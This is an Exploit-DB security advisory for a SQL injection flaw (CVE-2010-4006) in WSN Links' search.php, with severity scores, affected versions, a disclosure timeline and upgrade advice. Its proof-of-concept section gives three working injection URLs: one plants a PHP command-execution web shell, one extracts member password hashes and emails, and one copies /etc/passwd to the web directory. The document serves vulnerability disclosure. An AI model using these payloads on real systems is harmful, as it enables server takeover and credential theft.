Lucene search
Mark StanislavEDB-ID:15607HistoryNov 24, 2010 - 12:00 a.m.
WSN Links - SQL Injection
2010-11-2400:00:00
Mark Stanislav
www.exploit-db.com
37
6.6 Medium
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
42.0%
'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
Mark Stanislav - [email protected]
I. DESCRIPTION
---------------------------------------
A vulnerability exists in the search.php code that allows for SQL injection of various parameters. By assembling portions of SQL code between the affected parameters, successful SQL injection into the software can occur. In the testing done, various 'UNION SELECT' SQL injections can occur.
II. AFFECTED VERSIONS
---------------------------------------
< 6.0.1; < 5.1.51 ; < 5.0.81
III. TESTED VERSIONS
---------------------------------------
5.1.40 & 5.1.49
IV. PoC EXPLOITS
---------------------------------------
1) A 'UNION SELECT' which results in a PHP shell-execution script
http://example.com/search.php?namecondition=IS%20NULL))%20UNION%20((SELECT%20"<?php%20system($_REQUEST[cmd]);%20?>"%20INTO%20OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories
2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail to be extracted to a file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass.txt&action=filter&filled=1&whichtype=categories
3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web directory file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd.txt&action=filter&filled=1&whichtype=categories
V. NOTES
---------------------------------------
* The above exploits require 'FILE' SQL privilege as well as poor web directory permissions to work.
* Only 'namecondition' and 'namesearch' are utilized for the actual SQL injection.
* There is potential to exploit this vulnerability which outputs user data directly to the browser.
* Passing 'debug=1' as a query value easily enables debug mode of tested 'WSN Links' deployments.
VI. SOLUTION
---------------------------------------
Upgrade to the most recent version of your 'WSN Links' code branch.
VII. REFERENCES
---------------------------------------
http://www.wsnlinks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/
VIII. TIMELINE
---------------------------------------
10/10/2010: Initial discloure e-mail to the vendor
10/18/2010: Follow-up via the vendor's contact web form
10/18/2010: Vendor acknowledgement/commitment to fix
10/21/2010: Patched versions released
10/31/2010: Public disclosureRelated
exploitpack
exploitpack
WSN Links - SQL Injection
2010-11-24 00:00:00
securityvulns
securityvulns
packetstorm
packetstorm
WSN Links SQL Injection
2010-11-02 00:00:00
cve
cve
CVE-2010-4006
2010-11-03 20:00:00
myhack58
myhack58
prion
prion
Sql injection
2010-11-03 20:00:00
seebug
seebug
WSN Links SQL Injection Vulnerability
2014-07-01 00:00:00
6.6 Medium
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
42.0%
Related for EDB-ID:15607